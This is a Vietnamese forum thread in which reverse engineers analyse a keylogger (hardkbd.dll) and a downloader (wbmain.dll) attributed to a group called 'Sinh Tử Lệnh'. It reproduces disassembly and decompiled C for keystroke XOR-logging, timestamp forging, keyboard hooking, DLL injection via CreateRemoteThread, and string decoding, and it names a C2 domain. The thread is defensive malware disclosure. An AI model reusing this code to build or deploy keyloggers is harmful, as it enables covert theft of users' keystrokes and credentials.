.text:10002B73         push    ecx
.text:10002B74         push    ebx
.text:10002B75         mov     ebx, eax
.text:10002B77         mov     eax, [ebp+pszTxt]
.text:10002B7A         test    eax, eax
.text:10002B7C         jz      @@Return_FALSE
.text:10002B7C
.text:10002B82         test    ebx, ebx
.text:10002B84         jz      @@Return_FALSE
.text:10002B84
.text:10002B8A         push    edi
.text:10002B8B         mov     edi, [ebp+hFile]
.text:10002B8E         cmp     edi, 0FFFFFFFFh
.text:10002B91         jnz     short loc_10002B9B
.text:10002B91
.text:10002B93         or      eax, edi
.text:10002B95         pop     edi
.text:10002B96         pop     ebx
.text:10002B97         mov     esp, ebp
.text:10002B99         pop     ebp
.text:10002B9A         retn
.text:10002B9A
.text:10002B9B ; ---------------------------------------------------------------------------
.text:10002B9B
.text:10002B9B loc_10002B9B:                           ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+21j
.text:10002B9B         lea     edx, [eax+1]
.text:10002B9E         mov     edi, edi
.text:10002B9E
.text:10002BA0
.text:10002BA0 @@FindLen:                              ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+35j
.text:10002BA0         mov     cl, [eax]
.text:10002BA2         inc     eax
.text:10002BA3         test    cl, cl
.text:10002BA5         jnz     short @@FindLen
.text:10002BA5
.text:10002BA7         sub     eax, edx
.text:10002BA9         jnz     short @@AllocMem
.text:10002BA9
.text:10002BAB         pop     edi
.text:10002BAC         pop     ebx
.text:10002BAD         mov     esp, ebp
.text:10002BAF         pop     ebp
.text:10002BB0         retn
.text:10002BB0
.text:10002BB1 ; ---------------------------------------------------------------------------
.text:10002BB1
.text:10002BB1 @@AllocMem:                             ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+39j
.text:10002BB1         push    esi
.text:10002BB2         push    ebx                     ; size_t
.text:10002BB3         call    operator new(uint)
.text:10002BB3
.text:10002BB8         push    ebx                     ; size_t
.text:10002BB9         mov     esi, eax
.text:10002BBB         push    0                       ; int
.text:10002BBD         push    esi                     ; void *
.text:10002BBE         call    _memset
.text:10002BBE
.text:10002BC3         add     esp, 10h
.text:10002BC6         test    ebx, ebx
.text:10002BC8         jle     short @@WriteXorData
.text:10002BC8
.text:10002BCA         mov     ecx, [ebp+pszTxt]
.text:10002BCD         mov     eax, esi
.text:10002BCF         sub     ecx, esi
.text:10002BD1         mov     edi, ebx
.text:10002BD1
.text:10002BD3
.text:10002BD3 @@XorLoop:                              ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+6Dj
.text:10002BD3         mov     dl, [ecx+eax]
.text:10002BD6         xor     dl, 6Fh
.text:10002BD9         mov     [eax], dl
.text:10002BDB         inc     eax
.text:10002BDC         dec     edi
.text:10002BDD         jnz     short @@XorLoop
.text:10002BDD
.text:10002BDF         mov     edi, [ebp+hFile]
.text:10002BDF
.text:10002BE2
.text:10002BE2 @@WriteXorData:                         ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+58j
.text:10002BE2         push    2                       ; dwMoveMethod
.text:10002BE4         push    0                       ; lpDistanceToMoveHigh
.text:10002BE6         push    0                       ; lDistanceToMove
.text:10002BE8         push    edi                     ; hFile
.text:10002BE9         mov     [ebp+NumberOfBytesWritten], 0
.text:10002BF0         call    ds:SetFilePointer       ; Moves the file pointer of an open file.
.text:10002BF0
.text:10002BF6         push    0                       ; lpOverlapped
.text:10002BF8         lea     eax, [ebp+NumberOfBytesWritten]
.text:10002BFB         push    eax                     ; lpNumberOfBytesWritten
.text:10002BFC         push    ebx                     ; nNumberOfBytesToWrite
.text:10002BFD         push    esi                     ; lpBuffer
.text:10002BFE         push    edi                     ; hFile
.text:10002BFF         call    ds:WriteFile            ; Writes data to a file and is designed for both synchronous and asynchronous operation.
.text:10002BFF                                         ; The function starts writing data to the file at the position indicated by the file pointer.
.text:10002BFF
.text:10002C05         mov     ebx, eax
.text:10002C07         test    edi, edi
.text:10002C09         jz      short @@Return_TRUE
.text:10002C09
.text:10002C0B         cmp     dword_10021914, 0
.text:10002C12         jnz     short @@ChangeTime
.text:10002C12
.text:10002C14         call    FindAndGetTimeOfWinLogonExe
.text:10002C14
.text:10002C19         test    eax, eax
.text:10002C1B         jz      short @@Return_TRUE
.text:10002C1B
.text:10002C1D
.text:10002C1D @@ChangeTime:                           ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+A2j
.text:10002C1D         push    offset WinLogonExe_LastWriteTime ; lpLastWriteTime
.text:10002C22         push    offset WinLogonExe_LastAccessTime ; lpLastAccessTime
.text:10002C27         push    offset WinLogonExe_CreationTime ; lpCreationTime
.text:10002C2C         push    edi                     ; hFile
.text:10002C2D         call    ds:SetFileTime          ; Sets the date and time that a file was created, last accessed, or last modified.
.text:10002C2D
.text:10002C33
.text:10002C33 @@Return_TRUE:                          ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+99j
.text:10002C33                                         ; write_xor_0x6F_to_msdata_vxd_file+ABj
.text:10002C33         push    esi
.text:10002C34         call    operator_free
.text:10002C34
.text:10002C39         add     esp, 4
.text:10002C3C         pop     esi
.text:10002C3D         pop     edi
.text:10002C3E         mov     eax, ebx
.text:10002C40         pop     ebx
.text:10002C41         mov     esp, ebp
.text:10002C43         pop     ebp
.text:10002C44         retn
.text:10002C44
.text:10002C45 ; ---------------------------------------------------------------------------
.text:10002C45
.text:10002C45 @@Return_FALSE:                         ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+Cj
.text:10002C45                                         ; write_xor_0x6F_to_msdata_vxd_file+14j
.text:10002C45         xor     eax, eax
.text:10002C47         pop     ebx
.text:10002C48         mov     esp, ebp
.text:10002C4A         pop     ebp
.text:10002C4B         retn
.text:10002C4B
.text:10002C4B write_xor_0x6F_to_msdata_vxd_file endp

PS: Mọi người nên cẩn thận các trình gỏ tiếng Việt mà mình đang dùng: Unikey, Vietkey. Nếu search trong máy có file msdata.vxd thì các bạn đã bị nhiểm keylog của tụi: "Sống Chết nghe theo lệnh" này. Tiếp theo, em sẽ post tiếp RCE của file wbmain.dll.

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

TQN wrote:

................................ - Kiểm tra khi tao đi, thằng nào login vào hộp mail yahoo của tao. À thì ra tụi mày có thằng ở bên US à:
Tháng 5 28, 2011 10:25 AM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 5:25 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 12:32 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 1:31 AM Trình duy?t Ðang nh?p vào Mail FL, US Tháng 5 26, 2011 1:27 AM Trình duy?t Truy c?p Mail VA, US Tháng 5 26, 2011 1:22 AM Trình duy?t Ðang nh?p vào Mail VA, US Tháng 5 26, 2011 12:20 AM Trình duy?t Truy c?p Mail PA, US
.................................................. Chúng ta sẽ cùng tiếp tục phân tích đám malware của tụi "Sống Chết theo lệnh" này.
11:00 AM Trình duyệt Đăng nhập CA, US
Chậm chân rồi mấy cu ơi. Chiều giờ, tui nó login liên tục vào mail Yahoo của em. Em sơ ý quá, quên lấy cái IP của tui nó, giờ vào thì chỉ còn log từ sáng tới giờ. Sorry anh em nhé.

Hì hì thì có vài cái IP liên quan đây TQN à! Qua RCE file ....doc của STL, TQN đã tìm ra domain của website mà malware truy câp đền (để gửi đến các thông tin lấy cắp từ máy nạn nhân, cũng như nhận các command từ website ) là SMARTSHOW.INFO. Hiện nay website Smartshow.info nay đã không active, nên không thể trực tiếp resolve ra địa chỉ IP, computer name. location.... và các thông tin khác của webserver đang hosting website nói trên, cũng như mailserver liên quan mà STL đang dùng hay đã từng dùng. Đó cũng là cách mà STL dấu bài. Nhưng người ta vẫn có cách tìm ra những thông tin quan trong liên quan đến smartshow.info domain và website, dù rằng STL đã "tắt" website này từ lâuvà nhiều thông tin whois của domain đã được che đậy với kỹ thuật Private protection, như ta đã thấy. Sẽ xin viết cụ thể trong bài tới

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Hoan hô anh PXMMRF. Có anh tham gia là em thấy vui rồi, không thấy đơn độc nữa. Mấy cái vụ network, IP anh là sư phụ của em, mở topic mới nhé. Còn không là mai mốt offline, em dí anh cụng ly đấy. PS: Nói riêng với anh em STL nhé, em lỳ đòn khét tiếng đấy, hồi còn đấu đài ngồi Gialai, em bị mấy anh em đồng bào đánh lên bờ xuống ruộng, nhưng em vẫn trụ được và thắng điểm đấy nhé! Đánh giá lại đối thủ đi nhé, mấy nhóc STL, ăn học uổng cơm uổng gạo nhà nước, nhân dân. Trình độ code, RCE của em thì là cùi bắp với mấy đại ca thôi. Nên nếu em post có gì sai thì vào chỉ bảo nhé. Tui mày hơn tao ở chổ có tài trợ, đi du học, còn tao phải vừa lăn ra làm, bulon, ocvit, hàn cắt, thì sao bằng tui mày được. Phải không, mấy công tử COCC đi học trên tiền thuế của dân nghèo VN. Em có cái chủ quan, và cái VM của em trên cả real machine của em nó cùi bắp quá, chạy không nổi, nên em cứ phân tích sống trên máy thật (máy riêng, không phải máy làm ăn). Nên mới bị dính như vầy. Nhiều file keylog, malware của tụi này, khi em cách ly ra, em cứ chép chung vào một thư mục, nên khi phân tích, sẽ có thiếu sót về dây chuyền hoạt động của đám malware này. Anh em thông cảm nhé ! Ông nội nào vừa gởi cho em file SecretCrushRevealer.exe thế !? Ra mặt đi, đánh giá em thấp thế, em đâu có ngu tới mức bất cứ file .exe nào gởi cho em là em run liền để dính chấu đâu mấy đại ca. Nghề của em là phân tích PE, ELF file mà ???

RCE đám virus của Sinh Tử Lệnh.

quangredlight — GMT

Em vẫn thấy cái thuật toán mã hoá 6 tên miền trong HARDKBD là khó hiểu, bác TQN có thể phân tích đoạn ấy ko ạ, có có 2 key để giải mã ấy, rồi lấy ngẫu nhiên 1 trong 6 tên miền

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Hoan hô quangredlight. Em có được gì rồi, post lên chia sẽ mọi người đi em. Em hỏi Hardkbd.dll hay wbmain.dll ? Hardkbd.dll chỉ là keylog thôi mà, hay tui bỏ sót. VA của function đó = ? Đúng là tui có thiếu sót, Hardkbd.dll còn một thằng anh em đi kèm với nó nữa: IEFrame.ocx (giả danh IEFrame.dll của IE). Bà con nào có up lên cho tui và mọi người nhé. Nếu bạn nào phát hiện có msdata.vxd trong System32 hay Local App Data thì lập tức dùng các tool chuyên xoá file như Unlocker, XueTr, IceSword... để move hay delete liền 2 file: hardkbd.dll và ieframe.ocx ngay.

RCE đám virus của Sinh Tử Lệnh.

Kihote — GMT

hi anh TQN hịc thấy anh nóng máu quá =.= . em Whois domain đó thấy DNS domain trỏ về Name Server:NS1.BYETHOST42.ORG Name Server:NS2.BYETHOST42.ORG Sao ko thử liên hệ bên đó xem log bên đó anh nhỉ ? Lần theo domain phải là cách hông anh? Em thấy lần theo domain nó âm u quá.

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

Kihote wrote:

hi anh TQN hịc thấy anh nóng máu quá =.= . em Whois domain đó thấy DNS domain trỏ về Name Server:NS1.BYETHOST42.ORG Name Server:NS2.BYETHOST42.ORG Sao ko thử liên hệ bên đó xem log bên đó anh nhỉ ? Lần theo domain phải là cách hông anh? Em thấy lần theo domain nó âm u quá.

Đây chỉ là domain name của các máy chủ phân giải tên miền (Name servers) của tên miền-website SMARTSHOW.INFO thôi. Không phải là host name (computer name) của webserver (máy chủ chứa websites), mà website SMARTSHOW.INFO của STL đang hosting trên webserver này. Mailserver của STL cũng nằm tai server nói trên. Nó "âm u" quá, thì ta phải make it more clear ra chứ. Hì hì Đã có thêm một số thông tin về Hardkbd.dll và wbmain.dll. Sẽ xin post ở bài kế tiếp (chắc là trước bài sẽ viết về SMARTSHOW.INFO website)

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Hoan hô anh PMXMRF, vậy thì nhanh lên anh. Em rất nóng lòng chờ đọc bài của anh. Hôm qua giờ tui nó cứ liên tục tìm cách khôi phục password mail của em sau khi em chiếm lại. Anh em nào có ieframe.ocx trên máy thì up lên mediafire giúp em cái. Nếu có thì em mới post phân tích của hardkbd.dll được. Em rút kinh nghiệm rồi, những malware em có, trừ đám Vecebot mà Zorro gởi (KAV đã phát hiện), em đã gởi thẳng cho Kaspersky Lab rồi. Dưới đây là đoạn pesudo-C code của hàm Main của hardkbd.dll: Code:

osVer = GetVersion();
  pszPath = 0;
  memset(buffer, 0, 518u);
  hProcess = GetCurrentProcess();
  GetModuleFileNameExW(hProcess, 0, &pszPath, 260u);
  PathStripPathW(&pszPath);
  if ( !_wcsicmp(&pszPath, L"services.exe") )
  {
      ThreadId = 0;
      CreateThread(0, 0, ServicesThreadProc, 0, 0, &ThreadId);
  }
  notWinLogonExe = _wcsicmp(&pszPath, L"winlogon.exe");
  if ( osVer == 6 )
  {
      if ( notWinLogonExe )
          goto @@IsExplorer;
      ThreadId = 0;
      CreateThread(0, 0, WinLogonThreadProc, 0, 0, &ThreadId);
      ptid = &ThreadId;
      createFlags = 0;
      pParams = 0;
      threadProc = InjectExplorerThreadProc;
      goto @@CreateThread;
  }
  if ( !notWinLogonExe )
  {
      ThreadId = 0;
      InitMSDataVXDFile_LoadIEFrameOCX_HookKeyboard();
      CreateThread(0, 0, InjectExplorerThreadProc, 0, 0, &ThreadId);
  }
  if ( !_wcsicmp(&pszPath, L"logonui.exe") )
  {
      ptid = &ThreadId;
      createFlags = 0;
      pParams = 0;
      ThreadId = 0;
      threadProc = ThreadInLogOnUIExe;
@@CreateThread:
      CreateThread(0, 0, threadProc, pParams, createFlags, ptid);
  }
@@IsExplorer:
  if ( !_wcsicmp(&pszPath, L"explorer.exe") )
  {
      ThreadId = 0;
      CreateThread(0, 0, ThreadInExplorer, 0, 0, &ThreadId);
  }
  return -1;

Đoạn code khởi tạo file msdata.vxd, load ieframe.ocx và hook keyboard: Code:

if ( SHGetFolderPathA(0, CSIDL_COOKIES|CSIDL_PRINTERS, 0, 0, &DstBuf) < 0
    || (sprintf_s(&DstBuf, 260u, "%s\\msdata.vxd", &DstBuf),
        hmsdatavxd = CreateMSDataVxdFile(&DstBuf),
        hObject = hmsdatavxd,
        hmsdatavxd == -1) )
  {
      result = -1;
  }
  else
  {
      g_hmsdatavxdfile = hmsdatavxd;
      v2 = GetCurrentThreadId();
      SetWindowsHookExA(WH_KEYBOARD, DllRegisterServer, 0, v2);
      write_xor_0x6F_to_msdata_vxd_file(0x12u, hObject, "\r\n[Logon Window]\r\n");
      ThreadId = 0;
      CreateThread(0, 0, RemoteLoadIEFrameOCX, 0, 0, &ThreadId);
      result = 0;
  }
  return result;

Đoạn code load ieframe.ocx: Code:

do
  {
      Sleep(2000u);
      hLogonUIExe = FindLogonUIExeHandle();
      outputDbgBuf[0] = 0;
      memset(&outputDbgBuf[1], 0, 0x7Fu);
      sprintf_s(outputDbgBuf, 0x80u, "Logonui %i", hLogonUIExe);
      OutputDebugStringA(outputDbgBuf);
  }
  while ( !hLogonUIExe );
  *wszOcxPath = 0;
  memset(&wszOcxPath[2], 0, 0x144Eu);
  GetModuleFileNameW(hDLLInstance, wszOcxPath, 2600u);
  *wczDllPath = 0;
  memset(&wczDllPath[2], 0, 0x144Eu);
  GetModuleFileNameW(hDLLInstance, wczDllPath, 0xA28u);
  PathStripPathW(wczDllPath);
  *StrStrIW(wszOcxPath, wczDllPath) = 0;
  wcscat_s(wszOcxPath, 0xA28u, L"ieframe.ocx");
  hProcess = OpenProcess(0x3Au, 0, hLogonUIExe);
  v3 = hProcess;
  if ( hProcess )
  {
      lpMem = VirtualAllocEx(hProcess, 0, 0x1450u, 0x3000u, 4u);
      if ( lpMem )
      {
          lpwsz = wszOcxPath;
          NumberOfBytesWritten = 0;
          do
          {
              LenOfOCXPath = *lpwsz;
              lpwsz += 2;
          }
          while ( LenOfOCXPath );
          if ( WriteProcessMemory(v3, lpMem, wszOcxPath, 2 * ((lpwsz - &wszOcxPath[2]) >> 1), &NumberOfBytesWritten) )
          {
              ThreadId = 0;
              hThread = CreateRemoteThread(v3, 0, 0, LoadLibraryW, lpMem, 0, &ThreadId);
              CloseHandle(hThread);
          }
      }
  }
  return 0;

Tụi này chơi local buffer bự bà cố luôn, 5200 byte. Khiếp thê, MAX_PATH đâu mấy đại ca. VirtualAllocEx cũng 5200 byte luôn. Code:

char wczDllPath[5200];
char wszOcxPath[5200];

Mai mốt có viết con nào khác thì gởi em review code cho nhé. Nếu em bắt xoá, viết lại thì cứ chịu khó nhé. PS: À mà có cái này em không biết, LOBYTE(GetVersion) == 6 có phải là Windows 7 không mấy đại ca ! Máy em cùi bắp, chỉ chạy được Win2000 nên không bao giờ dám biết Vista, Win7 là gì cả. Thông cảm cho em hỏi hơi dốt nhé. Mai mốt đừng có nhét cái mail address

xuongduongtrenmang@gmail.com

vào cái email 2 của yahoo mail của em nữa nhé. Tính vu oan giá hoạ cho CA bắt em à. Chơi bẩn thế mấy nhóc ! Tụi mày chống phản động mà lại đi dùng cái mail đó à ? Bà con gâu gồ cái adress đó thì thấy. Em tính post hoàn chỉnh toàn bộ pesudoC code của hardkbd.dll, nhưng thấy không cần thiết, vì tụi này code C không có gì đặc biệt, cao thủ hay dùng một kỹ thuật mới nào cả. Toàn là "cái ai cũng biết là ai đó" nên thôi. Em tạm dừng hardkbd.dll ở đây. Nhưng bà còn an tâm, còn hơn 10 file dll, exe của tụi này nữa. Anh em BKIS, CMC vào tham gia cho vui, nếu em có gì sai, RCE non kém thì chỉ bảo cho em với.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Tiếp tục nào anh em, ta sẽ đi tiếp với wbmain.dll. File này nguyên bản được pack = PE Compact. Em đã manual unpack nó ra, dể dàng, do tụi STL này không biết cách dùng các plugin của PE Compact. File đã unpack là file em đã up lên mediafire. Em chỉ nhớ hồi mấy tháng trước em cách ly nó từ thư mục

Đây là MS Rich data của wbmain.dll:

Thằng code hardkbd.dll lại hớ hênh, build với debug info, không xoá debug info nên thư mục source code của nó còn nằm chình ình trong file dll:

Bà con gấu gồ với key: CyberGame thì sẽ tìm ra điều thú vị. Không lẽ có dính đến học viên của Aptech à ???? Qua debug info của hardkbd.dll, ta có thể kết luận, thằng coder STL này create project với name là ieframe.dll, sau đó nó mới đổi tên ieframe.dll thành hardkdb.dll và ieframe.ocx. Vậy chắc có lẽ ieframe.ocx không cần nữa, nhưng nếu ai đó up cho tui thì tốt. Trong wbmain.dll, STL coder này dùng một số hàm API WinHttp rất ít dùng, ít phổ biến (thậm chí em khi còn là coder cũng không biết tới, chỉ biết WinInet API, sau này search tới search lui mới biết). Các hàm WinHttp này nằm trong Winhttp.dll, khi build include Winhttp.h và link với Winhttp.lib:

Và HTTP header của nó:

Google với key WinHttpOpen, chỉ những trang tiếng Việt, nó cho ta topic (theo tui là chính xác nhất, cả Gecko gì đó luôn): http://forums.congdongcviet.com/showthread.php?p=202006#post202006 Không biết lequochoang2 này là ai, và sorry Kevin Hoàng nhé, em có dính dáng gì không ? À mà quên, cái Gecko string này chỉ là 1 trong 1 đống Gecko string của tụi nó, từ từ em post sau. Thằng coder wbmain.dll này dùng tá lã hết, copy code hả em, khi thì dùng socket API, khi thì dùng WinHttp API. Em chả hiểu nổi nữa. Bà con đừng giận em câu giờ, câu bài nhé, thích thì em mới làm thôi. Cái của nợ dll, exe này em có từ năm ngoái lân, nhưng chưa bao giờ RCE xong xuôi, ra đầu ra đũa cả. Bây giờ mới móc ra mà làm, post lên ! Sao có mình em độc diễn vầy nè, buồn quá ! Bà con reversers khác vào tham gia cho vui chứ !

RCE đám virus của Sinh Tử Lệnh.

cr4zyb0y — GMT

cái log của yahoo nó có lưu IP luôn đó anh TQN, anh post lên luôn đi .

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Trong wbmain.dll, tất cả các string đặc biệt, thằng coder này giấu hết. Khi run nó mới decode ra. Dưới đây là pesudo-C code của hàm Decode này: Code:

int __stdcall Decode(int key1, int key2, int srcBuf, int destBuf, int len)
{
  int mod; // edx@1
  int i; // ecx@1
  int result; // eax@3

  i = 0;
  mod = key1 % len;
  if ( len <= 0 )
  {
      result = 0;
  }
  else
  {
      do
      {
          *(mod + destBuf) = -1 - *(i + srcBuf);
          mod = (mod + key2) % len;
          ++i;
      }
      while ( i < len );
      result = 0;
  }
  return result;
}

Luôn luôn key1 = 0x9108D key2 = 0xD9E61 Hàm decode này em RCE đúng không, mấy anh em STL ? Lại còn dùng CRC32 nữa à ? Có copy code ở đâu không đó mấy em ! Hàm BuildCrc32Table hơi bị quái, do compiler hay do mấy em code đó. VA = 0x10001020 Code:

int __cdecl BuildCRC32Table()
{
  unsigned int i; // ecx@1
  unsigned int v1; // eax@2
  int v2; // eax@5
  int v3; // eax@8
  int v4; // eax@11
  int v5; // eax@14
  int v6; // eax@17
  int v7; // eax@20
  int result; // eax@23

  i = 0;
  do
  {
      v1 = i >> 1;
      if ( i & 1 )
          v1 ^= 0xEDB88320u;
      if ( v1 & 1 )
          v2 = (v1 >> 1) ^ 0xEDB88320;
      else
          v2 = v1 >> 1;
      if ( v2 & 1 )
          v3 = (v2 >> 1) ^ 0xEDB88320;
      else
          v3 = v2 >> 1;
      if ( v3 & 1 )
          v4 = (v3 >> 1) ^ 0xEDB88320;
      else
          v4 = v3 >> 1;
      if ( v4 & 1 )
          v5 = (v4 >> 1) ^ 0xEDB88320;
      else
          v5 = v4 >> 1;
      if ( v5 & 1 )
          v6 = (v5 >> 1) ^ 0xEDB88320;
      else
          v6 = v5 >> 1;
      if ( v6 & 1 )
          v7 = (v6 >> 1) ^ 0xEDB88320;
      else
          v7 = v6 >> 1;
      if ( v7 & 1 )
          result = (v7 >> 1) ^ 0xEDB88320;
      else
          result = v7 >> 1;
      CRCTable[i++] = result;
  }
  while ( i < 256 );
  return result;
}

Nói về crypto thì em phải goị mrro bằng sư phụ, nhưng mấy cái thuật toán crypto vớ vẫn, đơn giản là em nhình ra liền à. quangrelight à, anh biết em cũng là cao thủ về IDA, em vào giúp anh cái. Hàm decode có rồi, em hãy thử viết script = IDAPython, IDC, AppCall hay run emulate trên Bochs hoặc x86emu để lấy ra cái original string của tụi này cái. Giờ anh làm biếng code quá !

RCE đám virus của Sinh Tử Lệnh.

quangredlight — GMT

:D Hi bác TQN em đọc cái decode thì chỉ biết nó decode ra 6 cái địa chỉ , và dùng 1 hàm để lấy random 1 trong 6 cái đấy và connect gửi thông tin lên, xor 0x1D cái decode này em ko phân tích IDA được, toàn cho vào máy ảo rồi Olly thôi, đang ngồi hóng các cao thủ cho giải pháp decode nó, thật sự đọc cái decode này mà phát điên luôn ý, rối kinh khủng Giờ máy em đang điên điên :-( :-( , chắc phải cài lại win rồi mới làm tiếp được

RCE đám virus của Sinh Tử Lệnh.

PXMMRF — GMT

quangredlight wrote:

:D Hi bác TQN em đọc cái decode thì chỉ biết nó decode ra 6 cái địa chỉ , và dùng 1 hàm để lấy random 1 trong 6 cái đấy và connect gửi thông tin lên, xor 0x1D cái decode này em ko phân tích IDA được, toàn cho vào máy ảo rồi Olly thôi, đang ngồi hóng các cao thủ cho giải pháp decode nó, thật sự đọc cái decode này mà phát điên luôn ý, rối kinh khủng Giờ máy em đang điên điên :-( :-( , chắc phải cài lại win rồi mới làm tiếp được

Theo tôi, nếu gặp những khó khăn như trên, có thể nghĩ đến một cách tiếp cận khác. (sau đó có thể quay lai cách tiếp cận cũ) Các file .dll (hardkbd.dll- keylogger và wbmain.dll-downloader) mà chúng ta đang disassembling có những mối liên hệ với một service quan trong mà Trojan thiết lập mới trong hệ thống, có nhiệm vụ tạo socket kết nối Internet với máy chủ -website của hacker, để chuyển thông tin lấy cắp và nhận lệnh (thí dụ website smartshow.info) Service này, trong các malicious tool (ware) của STL hay của các Chinese hacker khác thường là "iprip", tiến trình của nó là svchost.exe -k netsves (chú ý phân biệt với svchost.exe gốc của Windows-local service) Vì bận quá, nên tôi chưa có thời gian phân tích kỹ 2 file dll nói trên và cho chay file virus.doc trên máy thật. Vả lại có phân tích thì cũng không bằng TQN được. Tuy nhiên đã socket spying sơ qua file tiến trình svchost.exe -k netsves nói trên (Bận quá, đang mắc nợ 2 bài mà chưa viết được, thông tin thì đã đủ. Sorry)

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Tiếp tục nào anh em, để lâu quá tụi STL tưởng mình không giải mã được rồi tụi nó cười thầm trong bụng nữa. Vào SG mấy ngày rồi mà chưa bước ra khỏi nhà, bỏ bê một đống công việc, cũng vì cái đám của nợ của STL để lại này. Mai mốt mấy anh STL có tiền thì chuyển vào tk VCB của em mà các anh đã biết nhé. Cảm ơn trước nha ;) Hàm Decode của wbmain.dll thì chúng ta đã có 99% source code rồi, đúng tới từng input parameter (đúng không mấy anh STL). Tiếp tục chúng ta cần tìm tất cả các xref tới hàm Decode, sau đó chúng ta sẽ lấy lại thông tin bị che dấu bằng các cách sau: 1. Viết script = IDAPython hay IDC trên IDA dựa vào Decode source. Nếu bạn nào dùng ImmDbg thì viết pyCommand, còn OllyDbg thì ODbgScript. Nếu dùng 101Editor hay FileInsight thì cũng có thể viết script = python hay 101 Editor script. 2. Run wbmain.dll này dưới trình debugger, cái này tui không khuyên, nếu muốn thì run dưới máy ảo. Các bạn có thể Set EIP tới các điểm bắt đầu call Decode rồi trace, watch stack. Hàm Decode này pure C, không gọi bất kỳ hàm API hay C RTL nên không sao ! 3. Viết Python/PHP script hay code 1 native small, app nhỏ dựa vào Decode source code, đọc offset của các chuỗi encoded string trong wbmain.dll rồi print ra. 4. Dùng các emulator để run các đoạn call hàm Decode. Vd trong IDA có Bochs debug plugin và ida-x86emu plugin của Chris. Trong các cách trên, cái nào mà có đụng tới viết, viết thì sorry anh em, em giờ lười code không chịu được. Tối qua ngồi nháp nháp cái IDC script và Pyhton script thì thôi luôn. Máy ảo VM của em thì chạy không nổi, cái XP SP2 trên đó thì khùng, chưa fix. Còn Bochs debug thì trên IDA 5.5 em đang dùng nó bị bug, không connect tới Bochs VM được. Bản 6.1 thì demo, không cho save, trace chỉ đươc 1 số hữu hạn lệnh. Dể xùng thiệt, nếu không thì chỉ với Bochs em dể dàng lấy hết các string encoded đó rồi. Sẵn đây đi xin xõ luôn, bà con BKAV, CMC hay VNSecurity nào có IDA 6 thì private share với em một bản nhé. Chắc chắn em không để nó leak ra ngoài đâu.

RCE đám virus của Sinh Tử Lệnh.

secmask — GMT

Vài string em decode được, em không rành RCE nên ngồi xem, học hỏi là chính thôi ah :D

98 9A 91 9A 8D 9E 93 D1+src dd 9A919A98h, 0D1939E8Dh, 0D0939287h, 0 --> /general.xml

15170 ; char dword_10015170[] _0000128C:10015170 D1 CF 9A DF 8B DF D3 8B+dword_10015170 dd 0DF9ACFD1h, 8BD3DF8Bh, 93DFDF8Dh, 0D1AA9E88h, 0DFD3D1F5h, 0DA9C9A97h, 938CCF9Ah, 0CED08B85h _0000128C:10015170 8D DF DF 93 88 9E AA D1+ ; DATA XREF: ThreadProc+2C4o _0000128C:10015170 F5 D1 D3 DF 97 9A 9C DA+ ; ThreadProc+2DFo _0000128C:10015170 9A CF 8C 93 85 8B D0 CE+ dd 0D19CCE91h, 91B99092h, 969B87ACh, 0D19AD0F2h, 0BED0AAD1h, 8EDFABF5h, 0C5B28790h, 0C9BCCDABh _0000128C:10015170 91 CE 9C D1 92 90 B9 91+ dd 0F597D093h, 91D296CEh, 90DA8F96h, 0DFC2C590h, 0B8CC8D90h, 9391D5CCh, 90B78FC5h, 938FABF2h _0000128C:10015170 AC 87 9B 96 F2 D0 9A D1+ dd 9CCBCE8Bh, 9ED7969Ah, 8DBC9AC5h, 8C8B8CC4h, 0D5CDF2C9h, 9C918BA8h, 0DFD19C8Ch, 0CE9A96D3h _0000128C:10015170 D1 AA D0 BE F5 AB DF 8E+ dd 9EC491CFh, 968C93CFh, 9092C4C5h, 0F2CCF59Ch, 87C4C6C6h, 0B8DFBE98h, 909288C2h, 90CFAFDFh _0000128C:10015170 90 87 B2 C5 AB CD BC C9+ dd 8BCA96D1h, 0AA90DFB7h, 8C9391D0h, 0CFCE8C87h, 0F2D291DFh, 9BC4D6BAh, 0AB8BDFD4h, 8FDFF5D0h _0000128C:10015170 93 D0 97 F5 CE 96 D2 91+ dd 0CFF2D09Eh, 0A890918Bh, 9399DF8Fh, 96C48E89h, 0D1F5D19Ah, 8B9296D0h, 0C794DF9Ah, 87939EB1h _0000128C:10015170 96 8F DA 90 90 C5 C2 DF+ dd 0 --> GET %s HTTP/1.1 Host: %s User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: Close

FF 99 FF B2 dword_10015264 dd 0B2FF99FFh ; DATA XREF: sub_10002B70+6Do _0000128C:10015264 ; sub_10002B70+87o _0000128C:10015268 FF A3 FF 90 dd 90FFA3FFh _0000128C:1001526C FF 8B FF BC dd 0BCFF8BFFh _0000128C:10015270 FF 8C FF 9E dd 9EFF8CFFh _0000128C:10015274 FF B2 FF 90 dd 90FFB2FFh _0000128C:10015278 FF 9B FF B2 dd 0B2FF9BFFh _0000128C:1001527C FF 8D FF D1 dd 0D1FF8DFFh _0000128C:10015280 FF A3 FF 9C dd 9CFFA3FFh _0000128C:10015284 FF 97 FF 8B dd 8BFF97FFh _0000128C:10015288 FF 96 FF 97 00 00 00 00+ dd 97FF96FFh, 5 dup(0) --> UNICODE: Microsoft\MMC\hh.dat

